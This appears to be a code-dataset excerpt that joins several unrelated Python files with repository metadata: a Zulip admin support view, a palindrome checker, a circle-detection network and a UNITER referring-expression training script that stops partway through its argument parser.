    pred_idx, _ = self.run_inference(
        ckpt_dir, image_files, labels, enable_ema, export_ckpt)
    top1_cnt, top5_cnt = 0.0, 0.0
    for i, label in enumerate(labels):
      # Boolean membership adds 1.0 on a hit, 0.0 otherwise.
      top1_cnt += label in pred_idx[i][:1]
      top5_cnt += label in pred_idx[i][:5]
      if i % 100 == 0:
        print('Step {}: top1_acc = {:4.2f}% top5_acc = {:4.2f}%'.format(
            i, 100 * top1_cnt / (i + 1), 100 * top5_cnt / (i + 1)))
        sys.stdout.flush()
    top1, top5 = 100 * top1_cnt / num_images, 100 * top5_cnt / num_images
    print('Final: top1_acc = {:4.2f}% top5_acc = {:4.2f}%'.format(top1, top5))
    return top1, top5
9d89c7090a871e77c04906fb87c88929e1d0abc0 | 13,671 | py | Python | analytics/views/support.py | BillyMagarali/zulip | 9406c21340b6810c58388020c562d475b1e25b2e | [
"Apache-2.0"
] | 1 | 2020-03-29T19:54:13.000Z | 2020-03-29T19:54:13.000Z | analytics/views/support.py | BillyMagarali/zulip | 9406c21340b6810c58388020c562d475b1e25b2e | [
"Apache-2.0"
] | null | null | null | analytics/views/support.py | BillyMagarali/zulip | 9406c21340b6810c58388020c562d475b1e25b2e | [
"Apache-2.0"
] | 1 | 2021-01-13T03:14:57.000Z | 2021-01-13T03:14:57.000Z | import urllib
from datetime import timedelta
from decimal import Decimal
from typing import Any, Dict, List, Optional
from urllib.parse import urlencode
from django.conf import settings
from django.core.exceptions import ValidationError
from django.core.validators import URLValidator
from django.http import HttpRequest, HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.urls import reverse
from django.utils.timesince import timesince
from django.utils.timezone import now as timezone_now
from django.utils.translation import gettext as _
from confirmation.models import Confirmation, _properties, confirmation_url
from confirmation.settings import STATUS_ACTIVE
from zerver.decorator import require_server_admin
from zerver.forms import check_subdomain_available
from zerver.lib.actions import (
do_change_plan_type,
do_change_realm_subdomain,
do_deactivate_realm,
do_scrub_realm,
do_send_realm_reactivation_email,
)
from zerver.lib.exceptions import JsonableError
from zerver.lib.realm_icon import realm_icon_url
from zerver.lib.request import REQ, has_request_variables
from zerver.lib.subdomains import get_subdomain_from_hostname
from zerver.lib.validator import check_bool, check_string_in, to_decimal, to_non_negative_int
from zerver.models import (
MultiuseInvite,
PreregistrationUser,
Realm,
UserProfile,
get_org_type_display_name,
get_realm,
)
from zerver.views.invite import get_invitee_emails_set
if settings.BILLING_ENABLED:
from corporate.lib.stripe import approve_sponsorship as do_approve_sponsorship
from corporate.lib.stripe import (
attach_discount_to_realm,
downgrade_at_the_end_of_billing_cycle,
downgrade_now_without_creating_additional_invoices,
get_discount_for_realm,
get_latest_seat_count,
make_end_of_cycle_updates_if_needed,
update_billing_method_of_current_plan,
update_sponsorship_status,
void_all_open_invoices,
)
from corporate.models import get_current_plan_by_realm, get_customer_by_realm
def get_plan_name(plan_type: int) -> str:
    """Return the human-readable name for a realm plan_type code."""
    # Index matches the plan_type integer constants; 0 is unused.
    plan_names = ("", "self hosted", "limited", "standard", "open source")
    return plan_names[plan_type]
def get_confirmations(
    types: List[int], object_ids: List[int], hostname: Optional[str] = None
) -> List[Dict[str, Any]]:
    """Collect confirmation-link details (sent in the last 30 days) for objects.

    NOTE(review): `hostname` is never read in this body — confirm whether the
    parameter can be dropped or was meant to affect URL generation.
    """
    lowest_datetime = timezone_now() - timedelta(days=30)
    confirmations = Confirmation.objects.filter(
        type__in=types, object_id__in=object_ids, date_sent__gte=lowest_datetime
    )

    confirmation_dicts = []
    for confirmation in confirmations:
        realm = confirmation.realm
        content_object = confirmation.content_object

        type = confirmation.type
        # Expiry is derived from the per-type validity configured in _properties.
        days_to_activate = _properties[type].validity_in_days
        expiry_date = confirmation.date_sent + timedelta(days=days_to_activate)

        assert content_object is not None
        if hasattr(content_object, "status"):
            # Objects that track a status tell us whether the link was used.
            if content_object.status == STATUS_ACTIVE:
                link_status = "Link has been clicked"
            else:
                link_status = "Link has never been clicked"
        else:
            link_status = ""

        now = timezone_now()
        if now < expiry_date:
            expires_in = timesince(now, expiry_date)
        else:
            expires_in = "Expired"

        url = confirmation_url(confirmation.confirmation_key, realm, type)
        confirmation_dicts.append(
            {
                "object": confirmation.content_object,
                "url": url,
                "type": type,
                "link_status": link_status,
                "expires_in": expires_in,
            }
        )
    return confirmation_dicts
# Accepted values for the `downgrade_method` POST parameter of the support view.
VALID_DOWNGRADE_METHODS = [
    "downgrade_at_billing_cycle_end",
    "downgrade_now_without_additional_licenses",
    "downgrade_now_void_open_invoices",
]

# Accepted values for the `status` POST parameter.
VALID_STATUS_VALUES = [
    "active",
    "deactivated",
]

# Accepted values for the `billing_method` POST parameter.
VALID_BILLING_METHODS = [
    "send_invoice",
    "charge_automatically",
]
@require_server_admin
@has_request_variables
def support(
    request: HttpRequest,
    realm_id: Optional[int] = REQ(default=None, converter=to_non_negative_int),
    plan_type: Optional[int] = REQ(default=None, converter=to_non_negative_int),
    discount: Optional[Decimal] = REQ(default=None, converter=to_decimal),
    new_subdomain: Optional[str] = REQ(default=None),
    status: Optional[str] = REQ(default=None, str_validator=check_string_in(VALID_STATUS_VALUES)),
    billing_method: Optional[str] = REQ(
        default=None, str_validator=check_string_in(VALID_BILLING_METHODS)
    ),
    sponsorship_pending: Optional[bool] = REQ(default=None, json_validator=check_bool),
    approve_sponsorship: Optional[bool] = REQ(default=None, json_validator=check_bool),
    downgrade_method: Optional[str] = REQ(
        default=None, str_validator=check_string_in(VALID_DOWNGRADE_METHODS)
    ),
    scrub_realm: Optional[bool] = REQ(default=None, json_validator=check_bool),
    query: Optional[str] = REQ("q", default=None),
) -> HttpResponse:
    """Server-admin support page: mutate one realm via POST, search via ?q=."""
    context: Dict[str, Any] = {}
    # Success messages survive a redirect (e.g. after a subdomain rename) via
    # the session; display them exactly once.
    if "success_message" in request.session:
        context["success_message"] = request.session["success_message"]
        del request.session["success_message"]

    if settings.BILLING_ENABLED and request.method == "POST":
        # We check that request.POST only has two keys in it: The
        # realm_id and a field to change.
        keys = set(request.POST.keys())
        if "csrfmiddlewaretoken" in keys:
            keys.remove("csrfmiddlewaretoken")
        if len(keys) != 2:
            raise JsonableError(_("Invalid parameters"))

        realm = Realm.objects.get(id=realm_id)
        acting_user = request.user
        assert isinstance(acting_user, UserProfile)
        # Exactly one mutation parameter is expected per POST (enforced above).
        if plan_type is not None:
            current_plan_type = realm.plan_type
            do_change_plan_type(realm, plan_type, acting_user=acting_user)
            msg = f"Plan type of {realm.string_id} changed from {get_plan_name(current_plan_type)} to {get_plan_name(plan_type)} "
            context["success_message"] = msg
        elif discount is not None:
            current_discount = get_discount_for_realm(realm) or 0
            attach_discount_to_realm(realm, discount, acting_user=acting_user)
            context[
                "success_message"
            ] = f"Discount of {realm.string_id} changed to {discount}% from {current_discount}%."
        elif new_subdomain is not None:
            old_subdomain = realm.string_id
            try:
                check_subdomain_available(new_subdomain)
            except ValidationError as error:
                context["error_message"] = error.message
            else:
                do_change_realm_subdomain(realm, new_subdomain, acting_user=acting_user)
                # Redirect so the page reloads querying the new subdomain.
                request.session[
                    "success_message"
                ] = f"Subdomain changed from {old_subdomain} to {new_subdomain}"
                return HttpResponseRedirect(
                    reverse("support") + "?" + urlencode({"q": new_subdomain})
                )
        elif status is not None:
            if status == "active":
                do_send_realm_reactivation_email(realm, acting_user=acting_user)
                context[
                    "success_message"
                ] = f"Realm reactivation email sent to admins of {realm.string_id}."
            elif status == "deactivated":
                do_deactivate_realm(realm, acting_user=acting_user)
                context["success_message"] = f"{realm.string_id} deactivated."
        elif billing_method is not None:
            if billing_method == "send_invoice":
                update_billing_method_of_current_plan(
                    realm, charge_automatically=False, acting_user=acting_user
                )
                context[
                    "success_message"
                ] = f"Billing method of {realm.string_id} updated to pay by invoice."
            elif billing_method == "charge_automatically":
                update_billing_method_of_current_plan(
                    realm, charge_automatically=True, acting_user=acting_user
                )
                context[
                    "success_message"
                ] = f"Billing method of {realm.string_id} updated to charge automatically."
        elif sponsorship_pending is not None:
            if sponsorship_pending:
                update_sponsorship_status(realm, True, acting_user=acting_user)
                context["success_message"] = f"{realm.string_id} marked as pending sponsorship."
            else:
                update_sponsorship_status(realm, False, acting_user=acting_user)
                context["success_message"] = f"{realm.string_id} is no longer pending sponsorship."
        elif approve_sponsorship:
            do_approve_sponsorship(realm, acting_user=acting_user)
            context["success_message"] = f"Sponsorship approved for {realm.string_id}"
        elif downgrade_method is not None:
            if downgrade_method == "downgrade_at_billing_cycle_end":
                downgrade_at_the_end_of_billing_cycle(realm)
                context[
                    "success_message"
                ] = f"{realm.string_id} marked for downgrade at the end of billing cycle"
            elif downgrade_method == "downgrade_now_without_additional_licenses":
                downgrade_now_without_creating_additional_invoices(realm)
                context[
                    "success_message"
                ] = f"{realm.string_id} downgraded without creating additional invoices"
            elif downgrade_method == "downgrade_now_void_open_invoices":
                downgrade_now_without_creating_additional_invoices(realm)
                voided_invoices_count = void_all_open_invoices(realm)
                context[
                    "success_message"
                ] = f"{realm.string_id} downgraded and voided {voided_invoices_count} open invoices"
        elif scrub_realm:
            do_scrub_realm(realm, acting_user=acting_user)
            context["success_message"] = f"{realm.string_id} scrubbed."

    if query:
        key_words = get_invitee_emails_set(query)

        # Search terms may be emails, subdomains, full names, or realm URLs.
        users = set(UserProfile.objects.filter(delivery_email__in=key_words))
        realms = set(Realm.objects.filter(string_id__in=key_words))

        for key_word in key_words:
            try:
                URLValidator()(key_word)
                parse_result = urllib.parse.urlparse(key_word)
                hostname = parse_result.hostname
                assert hostname is not None
                if parse_result.port:
                    hostname = f"{hostname}:{parse_result.port}"
                subdomain = get_subdomain_from_hostname(hostname)
                try:
                    realms.add(get_realm(subdomain))
                except Realm.DoesNotExist:
                    pass
            except ValidationError:
                # Not a URL: treat the term as a user's full name.
                users.update(UserProfile.objects.filter(full_name__iexact=key_word))

        # Annotate each matched realm with current billing/plan details.
        for realm in realms:
            realm.customer = get_customer_by_realm(realm)

            current_plan = get_current_plan_by_realm(realm)
            if current_plan is not None:
                new_plan, last_ledger_entry = make_end_of_cycle_updates_if_needed(
                    current_plan, timezone_now()
                )
                if last_ledger_entry is not None:
                    if new_plan is not None:
                        realm.current_plan = new_plan
                    else:
                        realm.current_plan = current_plan
                    realm.current_plan.licenses = last_ledger_entry.licenses
                    realm.current_plan.licenses_used = get_latest_seat_count(realm)

        # full_names can have , in them
        users.update(UserProfile.objects.filter(full_name__iexact=query))

        context["users"] = users
        context["realms"] = realms

        confirmations: List[Dict[str, Any]] = []

        preregistration_users = PreregistrationUser.objects.filter(email__in=key_words)
        confirmations += get_confirmations(
            [Confirmation.USER_REGISTRATION, Confirmation.INVITATION, Confirmation.REALM_CREATION],
            preregistration_users,
            hostname=request.get_host(),
        )

        multiuse_invites = MultiuseInvite.objects.filter(realm__in=realms)
        confirmations += get_confirmations([Confirmation.MULTIUSE_INVITE], multiuse_invites)

        confirmations += get_confirmations(
            [Confirmation.REALM_REACTIVATION], [realm.id for realm in realms]
        )

        context["confirmations"] = confirmations

    def get_realm_owner_emails_as_string(realm: Realm) -> str:
        # Comma-separated owner emails, sorted, for display in the template.
        return ", ".join(
            realm.get_human_owner_users()
            .order_by("delivery_email")
            .values_list("delivery_email", flat=True)
        )

    def get_realm_admin_emails_as_string(realm: Realm) -> str:
        # Comma-separated admin (non-owner) emails, sorted.
        return ", ".join(
            realm.get_human_admin_users(include_realm_owners=False)
            .order_by("delivery_email")
            .values_list("delivery_email", flat=True)
        )

    # Helpers and constants the template calls directly.
    context["get_realm_owner_emails_as_string"] = get_realm_owner_emails_as_string
    context["get_realm_admin_emails_as_string"] = get_realm_admin_emails_as_string
    context["get_discount_for_realm"] = get_discount_for_realm
    context["get_org_type_display_name"] = get_org_type_display_name
    context["realm_icon_url"] = realm_icon_url
    context["Confirmation"] = Confirmation

    return render(request, "analytics/support.html", context=context)
| 41.935583 | 130 | 0.663448 |
d021a27ad5495fdcda5443b56b4683ac6ba7c923 | 1,148 | py | Python | other/palindrome.py | 18-2-SKKU-OSS/2018-2-OSS-E5-- | 8bb7e4c239f5bd95f4635b442bb8b2838e76fb36 | [
"MIT"
] | 4 | 2018-12-02T14:21:02.000Z | 2019-02-28T04:15:42.000Z | other/palindrome.py | 18-2-SKKU-OSS/2018-2-OSS-E5 | 8bb7e4c239f5bd95f4635b442bb8b2838e76fb36 | [
"MIT"
] | 25 | 2018-11-27T10:00:05.000Z | 2018-12-11T01:58:46.000Z | other/palindrome.py | 18-2-SKKU-OSS/2018-2-OSS-E5-- | 8bb7e4c239f5bd95f4635b442bb8b2838e76fb36 | [
"MIT"
] | null | null | null | """
Palindrome : 회문으로, 앞에서부터 읽으나 뒤에서부터 읽으나 동일한 단어나 구를 의미한다.
이 코드에서 문자열을 입력받으면 그 문자열이 Palindrome 인지 아닌지를 테스트한다.
"""
# Check whether the given string is a palindrome (iterative version).
def is_palindrome(str):
    """Return True if the string reads the same forwards and backwards."""
    left, right = 0, len(str) - 1
    # Walk inward from both ends; any mismatch means it is not a palindrome.
    while left < right:
        if str[left] != str[right]:
            return False
        left += 1
        right -= 1
    return True
# Recursive implementation.
def recursive_palindrome(str):
    """Recursively check whether the string is a palindrome."""
    # Base case: zero or one character left means the middle was reached.
    if len(str) <= 1:
        return True
    # If the outermost characters match, recurse on the inner substring.
    if str[0] == str[len(str) - 1]:
        return recursive_palindrome(str[1:-1])
    return False
def main():
    """Demo: run both palindrome checks on a sample word."""
    sample = 'ama'
    lowered = sample.lower()
    print(recursive_palindrome(lowered))
    print(is_palindrome(lowered))


if __name__ == '__main__':
    main()
| 31.888889 | 99 | 0.541812 |
797130522e525a58e85e7b3f848947aed4b21310 | 2,150 | py | Python | detro/packages/circledet/network.py | Peiiii/detro | 26d74468d7554dc20b2a2daf7ec5009302c820f2 | [
"MIT"
] | null | null | null | detro/packages/circledet/network.py | Peiiii/detro | 26d74468d7554dc20b2a2daf7ec5009302c820f2 | [
"MIT"
] | null | null | null | detro/packages/circledet/network.py | Peiiii/detro | 26d74468d7554dc20b2a2daf7ec5009302c820f2 | [
"MIT"
] | null | null | null | from .resnet_backbone import resnet18
from torch import nn
import torch
import torch.nn.functional as F
from detro.networks.components import BiFPN, Center_layer, Offset_layer, Reg_layer, Heatmap_layer
from detro.networks.losslib import center_loss, distance_loss
class FeatureFusionNetwork(nn.Module):
    """Fuse multi-scale feature maps into one tensor.

    The first input only supplies the target spatial size; every remaining
    feature map is resized to that size and the results are concatenated
    along the channel dimension (inputs[0] itself is NOT concatenated).
    """

    def __init__(self):
        super().__init__()

    def forward(self, inputs):
        """Resize inputs[1:] to inputs[0]'s H×W and concat on the channel dim."""
        target_size = inputs[0].size()[-2:]
        # F.upsample is deprecated; F.interpolate is the drop-in replacement
        # with identical defaults (mode='nearest').
        resized = [F.interpolate(x, target_size) for x in inputs[1:]]
        return torch.cat(resized, dim=1)
class CircleNet(nn.Module):
    """Anchor-free circle detector.

    ResNet-18 backbone -> fused multi-scale features -> 1x1 conv bottleneck
    -> shared heatmap head predicting per-class center heatmaps plus one
    offset channel.
    """

    def __init__(self, num_classes=1):
        super().__init__()
        self.backbone = resnet18(pretrained=True)
        self.neck = FeatureFusionNetwork()
        # 896 = total channels of the concatenated backbone feature maps.
        self.conv1 = nn.Conv2d(896, 256, kernel_size=1, stride=1, padding=0)
        self.bn1 = nn.BatchNorm2d(256)
        self.relu = nn.ReLU(inplace=True)
        # Head outputs num_classes center channels plus one offset channel.
        self.hm_layer = Heatmap_layer(in_channels=256, out_channels=num_classes + 1)

    def forward(self, inputs):
        c1, c2, c3, c4, c5 = self.backbone(inputs)
        fused = self.neck([c2, c3, c4, c5])
        fused = self.relu(self.bn1(self.conv1(fused)))
        head = self.hm_layer(fused)
        # Split the head: all but the last channel are center heatmaps.
        return dict(
            center_heatmap=head[:, :-1],
            offsets=head[:, -1:],
        )
def CircleDetCriterion(preds, labels):
    """Compute circle-detection losses: center heatmap + masked offset loss."""
    loss_center = center_loss(preds['center_heatmap'], labels['center_heatmap'])
    loss_offsets = distance_loss(
        preds['offsets'], labels['offsets'], labels['offsets_mask'])
    return dict(
        loss=loss_center + loss_offsets,
        loss_center=loss_center,
        loss_offsets=loss_offsets,
    )
| 33.59375 | 97 | 0.649767 |
b7c25049691eff112fc8f67645c526e58953697f | 18,420 | py | Python | train_re.py | carboncoo/UNITER | dfe007c2cea55430a847fd1cf318e88ae8ffe88f | [
"MIT"
] | 612 | 2020-01-28T00:34:23.000Z | 2022-03-31T00:40:06.000Z | train_re.py | carboncoo/UNITER | dfe007c2cea55430a847fd1cf318e88ae8ffe88f | [
"MIT"
] | 90 | 2020-02-18T10:54:40.000Z | 2022-03-17T07:36:35.000Z | train_re.py | carboncoo/UNITER | dfe007c2cea55430a847fd1cf318e88ae8ffe88f | [
"MIT"
] | 114 | 2020-01-31T03:03:25.000Z | 2022-03-17T15:53:51.000Z | """
Copyright (c) Microsoft Corporation.
Licensed under the MIT license.
UNITER finetuning for RE
"""
import argparse
import json
import os
from os.path import exists, join
from time import time
import torch
from torch.nn.utils import clip_grad_norm_
from torch.utils.data import DataLoader
from torch.optim import Adam, Adamax
from apex import amp
from horovod import torch as hvd
from tqdm import tqdm
from data import (PrefetchLoader, DetectFeatLmdb,
ReTxtTokLmdb, ReDataset, ReEvalDataset,
re_collate, re_eval_collate)
from data.sampler import DistributedSampler
from model.re import UniterForReferringExpressionComprehension
from optim import AdamW, get_lr_sched
from utils.logger import LOGGER, TB_LOGGER, RunningMeter, add_log_to_file
from utils.distributed import (
all_gather_list, all_reduce_and_rescale_tensors,
broadcast_tensors)
from utils.save import ModelSaver, save_training_meta
from utils.misc import (
NoOp, parse_with_config, set_dropout, set_random_seed)
from utils.const import IMG_DIM
def create_dataloader(img_path, txt_path, batch_size, is_train,
                      dset_cls, collate_fn, opts):
    """Build a distributed, prefetching DataLoader over an image/text LMDB pair.

    NOTE(review): the `batch_size` argument is immediately overwritten from
    `opts` below, so the value passed in is ignored — confirm intent.
    """
    # Ground-truth COCO boxes keep all 100 regions with no confidence filter.
    img_db_type = "gt" if "coco_gt" in img_path else "det"
    conf_th = -1 if img_db_type == "gt" else opts.conf_th
    num_bb = 100 if img_db_type == "gt" else opts.num_bb
    img_db = DetectFeatLmdb(img_path, conf_th, opts.max_bb, opts.min_bb,
                            num_bb, opts.compressed_db)
    # Evaluation keeps full-length text (-1 disables truncation).
    txt_db = ReTxtTokLmdb(txt_path, opts.max_txt_len if is_train else -1)
    if is_train:
        dset = dset_cls(txt_db, img_db)
    else:
        dset = dset_cls(txt_db, img_db, use_gt_feat=img_db_type == "gt")
    batch_size = (opts.train_batch_size if is_train
                  else opts.val_batch_size)
    # Shard the dataset across Horovod workers; no shuffling at the sampler.
    sampler = DistributedSampler(dset, num_replicas=hvd.size(),
                                 rank=hvd.rank(), shuffle=False)
    dataloader = DataLoader(dset, sampler=sampler,
                            batch_size=batch_size,
                            num_workers=opts.n_workers,
                            pin_memory=opts.pin_mem, collate_fn=collate_fn)
    # Overlap host-to-device copies with compute.
    dataloader = PrefetchLoader(dataloader)
    return dataloader
def build_optimizer(model, opts):
    """ Re linear may get larger learning rate """
    no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']

    # Split parameters: the RE output head gets its own learning-rate groups.
    base_params = [(n, p) for n, p in model.named_parameters()
                   if 're_output' not in n]
    head_params = [(n, p) for n, p in model.named_parameters()
                   if 're_output' in n]

    def _with_decay(named):
        # Parameters that receive weight decay.
        return [p for n, p in named if not any(nd in n for nd in no_decay)]

    def _without_decay(named):
        # Biases and LayerNorm parameters are excluded from weight decay.
        return [p for n, p in named if any(nd in n for nd in no_decay)]

    optimizer_grouped_parameters = [
        {'params': _with_decay(head_params),
         'lr': opts.learning_rate,
         'weight_decay': opts.weight_decay},
        {'params': _without_decay(head_params),
         'lr': opts.learning_rate,
         'weight_decay': 0.0},
        {'params': _with_decay(base_params),
         'weight_decay': opts.weight_decay},
        {'params': _without_decay(base_params),
         'weight_decay': 0.0},
    ]

    # currently Adam only
    if opts.optim == 'adam':
        OptimCls = Adam
    elif opts.optim == 'adamax':
        OptimCls = Adamax
    elif opts.optim == 'adamw':
        OptimCls = AdamW
    else:
        raise ValueError('invalid optimizer')
    return OptimCls(optimizer_grouped_parameters,
                    lr=opts.learning_rate, betas=opts.betas)
def main(opts):
    """Distributed training entry point for referring-expression comprehension.

    Initializes horovod, builds train/val dataloaders, optionally restores a
    checkpoint, then runs the apex-amp mixed-precision training loop until
    ``opts.num_train_steps`` optimizer updates have been performed.  Rank 0
    owns all logging/checkpointing; other ranks use NoOp stand-ins.
    """
    hvd.init()
    n_gpu = hvd.size()
    device = torch.device("cuda", hvd.local_rank())
    torch.cuda.set_device(hvd.local_rank())
    rank = hvd.rank()
    opts.rank = rank
    LOGGER.info("device: {} n_gpu: {}, rank: {}, "
                "16-bits training: {}".format(
                    device, n_gpu, hvd.rank(), opts.fp16))
    if opts.gradient_accumulation_steps < 1:
        raise ValueError("Invalid gradient_accumulation_steps parameter: {}, "
                         "should be >= 1".format(
                            opts.gradient_accumulation_steps))
    set_random_seed(opts.seed)
    # train_examples = None
    LOGGER.info(f"Loading Train Dataset {opts.train_txt_db}, "
                f"{opts.train_img_db}")
    train_dataloader = create_dataloader(opts.train_img_db, opts.train_txt_db,
                                         opts.train_batch_size, True,
                                         ReDataset, re_collate, opts)
    val_dataloader = create_dataloader(opts.val_img_db, opts.val_txt_db,
                                       opts.val_batch_size, False,
                                       ReEvalDataset, re_eval_collate, opts)
    # Prepare model
    if opts.checkpoint:
        checkpoint = torch.load(opts.checkpoint)
    else:
        checkpoint = {}
    # all text dbs must have been built with the same tokenizer
    all_dbs = [opts.train_txt_db, opts.val_txt_db]
    toker = json.load(open(f'{all_dbs[0]}/meta.json'))['toker']
    assert all(toker == json.load(open(f'{db}/meta.json'))['toker']
               for db in all_dbs)
    model = UniterForReferringExpressionComprehension.from_pretrained(
        opts.model_config, checkpoint,
        img_dim=IMG_DIM, loss=opts.train_loss,
        margin=opts.margin,
        hard_ratio=opts.hard_ratio, mlp=opts.mlp,)
    model.to(device)
    model.train()
    # make sure every process has same model parameters in the beginning
    broadcast_tensors([p.data for p in model.parameters()], 0)
    set_dropout(model, opts.dropout)
    optimizer = build_optimizer(model, opts)
    # Apex
    model, optimizer = amp.initialize(
        model, optimizer, enabled=opts.fp16, opt_level='O2')
    global_step = 0
    if rank == 0:
        save_training_meta(opts)
        TB_LOGGER.create(join(opts.output_dir, 'log'))
        pbar = tqdm(total=opts.num_train_steps)
        model_saver = ModelSaver(join(opts.output_dir, 'ckpt'), 'model_epoch')
        os.makedirs(join(opts.output_dir, 'results'))  # store RE predictions
        add_log_to_file(join(opts.output_dir, 'log', 'log.txt'))
    else:
        # non-zero ranks stay silent and skip checkpointing
        LOGGER.disabled = True
        pbar = NoOp()
        model_saver = NoOp()
    LOGGER.info(f"***** Running training with {n_gpu} GPUs *****")
    LOGGER.info("  Num examples = %d", len(train_dataloader.dataset))
    LOGGER.info("  Batch size = %d", opts.train_batch_size)
    LOGGER.info("  Accumulate steps = %d", opts.gradient_accumulation_steps)
    LOGGER.info("  Num steps = %d", opts.num_train_steps)
    running_loss = RunningMeter('loss')
    model.train()
    n_examples = 0
    n_epoch = 0
    best_val_acc, best_epoch = None, None
    start = time()
    # quick hack for amp delay_unscale bug
    optimizer.zero_grad()
    if global_step == 0:
        optimizer.step()
    while True:
        for step, batch in enumerate(train_dataloader):
            if global_step >= opts.num_train_steps:
                break
            n_examples += batch['input_ids'].size(0)
            loss = model(batch, compute_loss=True)
            loss = loss.sum()  # sum over vectorized loss TODO: investigate
            # only unscale (and all-reduce) on the last accumulation micro-step
            delay_unscale = (step+1) % opts.gradient_accumulation_steps != 0
            with amp.scale_loss(
                    loss, optimizer, delay_unscale=delay_unscale
                    ) as scaled_loss:
                scaled_loss.backward()
                if not delay_unscale:
                    # gather gradients from every processes
                    # do this before unscaling to make sure every process uses
                    # the same gradient scale
                    grads = [p.grad.data for p in model.parameters()
                             if p.requires_grad and p.grad is not None]
                    all_reduce_and_rescale_tensors(grads, float(1))
            running_loss(loss.item())
            if (step + 1) % opts.gradient_accumulation_steps == 0:
                global_step += 1
                # learning rate scheduling
                lr_this_step = get_lr_sched(global_step, opts)
                for i, param_group in enumerate(optimizer.param_groups):
                    # groups 0/1 are the RE head (see build_optimizer) and
                    # get an lr_mul-scaled learning rate
                    if i == 0 or i == 1:
                        param_group['lr'] = lr_this_step * opts.lr_mul
                    elif i == 2 or i == 3:
                        param_group['lr'] = lr_this_step
                    else:
                        raise ValueError()
                TB_LOGGER.add_scalar('lr', lr_this_step, global_step)
                # log loss
                # NOTE: not gathered across GPUs for efficiency
                TB_LOGGER.add_scalar('loss', running_loss.val, global_step)
                TB_LOGGER.step()
                # update model params
                if opts.grad_norm != -1:
                    grad_norm = clip_grad_norm_(amp.master_params(optimizer),
                                                opts.grad_norm)
                    TB_LOGGER.add_scalar('grad_norm', grad_norm, global_step)
                optimizer.step()
                optimizer.zero_grad()
                pbar.update(1)
                if global_step % 100 == 0:
                    # monitor training throughput
                    LOGGER.info(f'============Step {global_step}=============')
                    tot_ex = sum(all_gather_list(n_examples))
                    ex_per_sec = int(tot_ex / (time()-start))
                    LOGGER.info(f'{tot_ex} examples trained at '
                                f'{ex_per_sec} ex/s')
                    TB_LOGGER.add_scalar('perf/ex_per_s',
                                         ex_per_sec, global_step)
                    LOGGER.info('===========================================')
        # evaluate after each epoch
        val_log, _ = validate(model, val_dataloader)
        TB_LOGGER.log_scaler_dict(val_log)
        # save model
        n_epoch += 1
        model_saver.save(model, n_epoch)
        LOGGER.info(f"finished {n_epoch} epochs")
        # save best model
        if best_val_acc is None or val_log['valid/acc'] > best_val_acc:
            best_val_acc = val_log['valid/acc']
            best_epoch = n_epoch
            model_saver.save(model, 'best')
        # shuffle training data for the next epoch
        train_dataloader.loader.dataset.shuffle()
        # is training finished?
        if global_step >= opts.num_train_steps:
            break
    # final evaluation; every rank dumps its own prediction shard
    val_log, results = validate(model, val_dataloader)
    with open(f'{opts.output_dir}/results/'
              f'results_{global_step}_'
              f'rank{rank}_final.json', 'w') as f:
        json.dump(results, f)
    TB_LOGGER.log_scaler_dict(val_log)
    model_saver.save(model, f'{global_step}_final')
    # print best model
    LOGGER.info(
        f'best_val_acc = {best_val_acc*100:.2f}% at epoch {best_epoch}.')
@torch.no_grad()
def validate(model, val_dataloader):
    """Evaluate RE comprehension and return ``(metrics, predictions)``.

    A prediction counts as correct when the IoU between the top-scoring
    box and the ground-truth box exceeds 0.5.  Counts are aggregated
    across all workers via all_gather_list.
    """
    LOGGER.info("start running evaluation.")
    model.eval()
    st = time()
    tot_score = 0
    n_ex = 0
    predictions = {}
    compute_iou = val_dataloader.loader.dataset.computeIoU
    for batch in val_dataloader:
        # model scores: (n, max_num_bb); pick the best box per sample
        best_ixs = torch.argmax(
            model(batch, compute_loss=False), 1).cpu().detach().numpy()
        samples = zip(best_ixs, batch['obj_boxes'],
                      batch['tgt_box'], batch['sent_ids'])
        for best_ix, obj_boxes, tgt_box, sent_id in samples:
            pred_box = obj_boxes[best_ix]
            predictions[int(sent_id)] = {'pred_box': pred_box.tolist(),
                                         'tgt_box': tgt_box.tolist()}
            tot_score += int(compute_iou(pred_box, tgt_box) > .5)
            n_ex += 1
    tot_time = time()-st
    tot_score = sum(all_gather_list(tot_score))
    n_ex = sum(all_gather_list(n_ex))
    val_acc = tot_score / n_ex
    val_log = {'valid/acc': val_acc, 'valid/ex_per_s': n_ex/tot_time}
    model.train()
    LOGGER.info(
        f"validation ({n_ex} sents) finished in {int(tot_time)} seconds"
        f", accuracy: {val_acc*100:.2f}%")
    return val_log, predictions
if __name__ == '__main__':
    # CLI for the RE-comprehension fine-tuning job; values may also come
    # from a JSON config file via --config (see parse_with_config).
    parser = argparse.ArgumentParser()
    # Required parameters
    parser.add_argument("--train_txt_db",
                        default=None, type=str,
                        help="The input train corpus. (LMDB)")
    parser.add_argument("--train_img_db",
                        default=None, type=str,
                        help="The input train images.")
    parser.add_argument("--val_txt_db",
                        default=None, type=str,
                        help="The input validation corpus. (LMDB)")
    parser.add_argument("--val_img_db",
                        default=None, type=str,
                        help="The input validation images.")
    parser.add_argument('--compressed_db', action='store_true',
                        help='use compressed LMDB')
    parser.add_argument("--model_config",
                        default=None, type=str,
                        help="json file for model architecture")
    parser.add_argument("--checkpoint",
                        default=None, type=str,
                        help="pretrained model (can take 'google-bert') ")
    parser.add_argument("--mlp", default=1, type=int,
                        help="number of MLP layers for RE output")
    parser.add_argument(
        "--output_dir", default=None, type=str,
        help="The output directory where the model checkpoints will be "
             "written.")
    # Prepro parameters
    parser.add_argument('--max_txt_len', type=int, default=60,
                        help='max number of tokens in text (BERT BPE)')
    parser.add_argument('--conf_th', type=float, default=0.2,
                        help='threshold for dynamic bounding boxes '
                             '(-1 for fixed)')
    parser.add_argument('--max_bb', type=int, default=100,
                        help='max number of bounding boxes')
    parser.add_argument('--min_bb', type=int, default=10,
                        help='min number of bounding boxes')
    parser.add_argument('--num_bb', type=int, default=36,
                        help='static number of bounding boxes')
    # training parameters
    parser.add_argument("--train_batch_size",
                        default=128, type=int,
                        help="Total batch size for training. "
                             "(batch by examples)")
    parser.add_argument("--val_batch_size",
                        default=256, type=int,
                        help="Total batch size for validation. "
                             "(batch by examples)")
    parser.add_argument('--gradient_accumulation_steps',
                        type=int,
                        default=16,
                        help="Number of updates steps to accumualte before "
                             "performing a backward/update pass.")
    parser.add_argument("--train_loss",
                        default="cls", type=str,
                        choices=['cls', 'rank'],
                        help="loss to used during training")
    parser.add_argument("--margin",
                        default=0.2, type=float,
